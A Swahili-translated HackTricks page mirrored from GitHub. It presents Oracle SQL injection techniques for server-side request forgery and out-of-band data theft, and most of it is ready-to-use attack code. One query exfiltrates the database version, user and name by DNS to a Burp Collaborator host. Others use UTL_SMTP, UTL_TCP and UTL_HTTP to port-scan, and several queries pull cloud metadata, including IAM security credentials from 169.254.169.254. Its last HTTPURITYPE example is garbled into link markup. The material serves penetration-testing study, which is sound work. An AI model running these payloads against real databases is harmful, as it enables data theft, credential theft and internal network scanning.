Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 00:20:59 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/sql-injection/oracle-injection.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

169 lines
10 KiB
Markdown
Raw Blame History

# Uvamizi wa Oracle
<details>
<summary><strong>Jifunze kuhusu uvamizi wa AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
**Toa nakala ya machapisho haya kutoka kwenye tovuti ya wayback machine ya chapisho lililofutwa kutoka [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
## SSRF
Kutumia Oracle kufanya maombi ya HTTP na DNS nje ya kawaida ni jambo lililodhibitishwa vizuri lakini kama njia ya kuvuja data ya SQL katika uvamizi. Tunaweza daima kurekebisha mbinu/huduma hizi ili kufanya SSRF/XSPA nyingine.
Kuweka Oracle kunaweza kuwa jambo gumu sana, haswa ikiwa unataka kuweka mfano wa haraka wa kujaribu amri. Rafiki yangu na mwenzangu katika [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), alinielekeza kwenye [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c) ambayo iliniruhusu kuweka mfano kwenye kompyuta ya AWS Ubuntu ya t2.large na Docker.
Nilikimbia amri ya docker na bendera ya `--network="host"` ili niweze kuiga Oracle kama ufungaji wa asili na ufikiaji kamili wa mtandao, kwa muda wa chapisho hili la blogu.
```
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
```
#### Paketi za Oracle zinazounga mkono URL au maelezo ya Jina la Mwenyeji/Namba ya Bandari <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
Ili kupata paketi na kazi zozote zinazounga mkono maelezo ya jina la mwenyeji na namba ya bandari, nilifanya utafutaji kwenye [Hati za Mtandaoni za Oracle Database](https://docs.oracle.com/database/121/index.html). Kwa usahihi,
```
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
```
Utafutaji ulirudi matokeo yafuatayo (si yote yanaweza kutumika kufanya mtandao wa nje):
* DBMS\_NETWORK\_ACL\_ADMIN
* UTL\_SMTP
* DBMS\_XDB
* DBMS\_SCHEDULER
* DBMS\_XDB\_CONFIG
* DBMS\_AQ
* UTL\_MAIL
* DBMS\_AQELM
* DBMS\_NETWORK\_ACL\_UTILITY
* DBMS\_MGD\_ID\_UTL
* UTL\_TCP
* DBMS\_MGWADM
* DBMS\_STREAMS\_ADM
* UTL\_HTTP
Utafutaji huu wa kawaida unapuuza pakiti kama `DBMS_LDAP` (ambayo inaruhusu kupitisha jina la mwenyeji na nambari ya bandari) kama [ukurasa wa nyaraka](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) unakuelekeza tu kwenye [eneo tofauti](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Hivyo, kuna pakiti zingine za Oracle ambazo zinaweza kutumiwa vibaya kufanya maombi ya nje ambazo nimezikosa.
Kwa hali yoyote, hebu tuangalie baadhi ya pakiti ambazo tumegundua na kuziorodhesha hapo juu.
**DBMS\_LDAP.INIT**
Pakiti ya `DBMS_LDAP` inaruhusu kupata data kutoka kwenye seva za LDAP. Kazi ya `init()` inaanzisha kikao na seva ya LDAP na inachukua jina la mwenyeji na nambari ya bandari kama hoja.
Kazi hii imekwisha elezewa hapo awali kuonyesha utekaji wa data kupitia DNS, kama ifuatavyo
```
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
```
Hata hivyo, ukizingatia kuwa kazi inakubali jina la mwenyeji na nambari ya bandari kama hoja, unaweza kutumia hii kufanya kazi kama skana ya bandari pia.
Hapa kuna mifano michache
```
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
```
`ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` inaonyesha kuwa bandari imefungwa wakati thamani ya kikao inaashiria kuwa bandari iko wazi.
**UTL\_SMTP**
Kifurushi cha `UTL_SMTP` kimeundwa kwa ajili ya kutuma barua pepe kupitia SMTP. Mfano uliotolewa kwenye [tovuti ya nyaraka za Oracle inaonyesha jinsi unavyoweza kutumia kifurushi hiki kutuma barua pepe](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478). Kwetu sisi, hata hivyo, jambo linalovutia ni uwezo wa kutoa maelezo ya mwenyeji na bandari.
Mfano wa kubahatisha unaonyeshwa hapa chini na kazi ya `UTL_SMTP.OPEN_CONNECTION`, na muda wa kusubiri wa sekunde 2
```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
```
```
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
```
`ORA-29276: transfer timeout` inaonyesha kuwa bandari iko wazi lakini hakuna uhusiano wa SMTP ulioanzishwa wakati `ORA-29278: SMTP transient error: 421 Service not available` inaonyesha kuwa bandari imefungwa.
**UTL\_TCP**
Kifurushi cha `UTL_TCP` na taratibu na kazi zake kuruhusu [mawasiliano yanayotegemea TCP/IP na huduma](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). Ikiwa imeprogramuwa kwa huduma maalum, kifurushi hiki kinaweza kuwa njia rahisi ya kuingia kwenye mtandao au kutekeleza Maombi ya Upande wa Seva kwani vipengele vyote vya uhusiano wa TCP/IP vinaweza kudhibitiwa.
Mfano [kwenye tovuti ya nyaraka za Oracle unaonyesha jinsi unavyoweza kutumia kifurushi hiki kuunda uhusiano wa TCP safi ili kupata ukurasa wa wavuti](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). Tunaweza kuifanya iwe rahisi zaidi na kutumia kuomba kwa mfano kwa kielelezo cha metadata au kwa huduma yoyote ya TCP/IP isiyojulikana.
```
set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
```
```
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
```
Kwa kushangaza, kutokana na uwezo wa kuunda ombi la TCP la moja kwa moja, kifurushi hiki pia kinaweza kutumika kuuliza huduma ya meta-data ya Kifaa cha Wingu cha watoa huduma wote wa wingu kwa sababu aina ya njia na vichwa vya ziada vinaweza kupitishwa ndani ya ombi la TCP.
**UTL\_HTTP na Ombi za Wavuti**
Labda njia ya kawaida na iliyoandikwa sana katika kila mafunzo ya Oracle SQL Injection nje ya Band ni [`kifurushi cha UTL_HTTP`](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070). Kifurushi hiki kimefafanuliwa na nyaraka kama - `Kifurushi cha UTL_HTTP kinafanya wito wa Hypertext Transfer Protocol (HTTP) kutoka SQL na PL/SQL. Unaweza kutumia kifurushi hiki kupata data kwenye Mtandao kupitia HTTP.`
```
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
```
Unaweza pia kutumia hii kufanya uchunguzi wa bandari za msingi kwa kutumia maswali kama vile
```
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
```
`ORA-12541: TNS:no listener` au `TNS:operation timed out` ni ishara kwamba bandari ya TCP imefungwa, wakati `ORA-29263: HTTP protocol error` au data ni ishara kwamba bandari imefunguliwa.
Kifurushi kingine nilichotumia hapo awali na mafanikio tofauti ni [`GETCLOB()` method ya aina ya kawaida ya Oracle ya `HTTPURITYPE`](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705) ambayo inakuwezesha kuingiliana na URL na inatoa msaada kwa itifaki ya HTTP. `GETCLOB()` method hutumiwa kupata majibu ya GET kutoka kwenye URL kama aina ya data ya [CLOB.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Reference in a new issue View git blame Copy permalink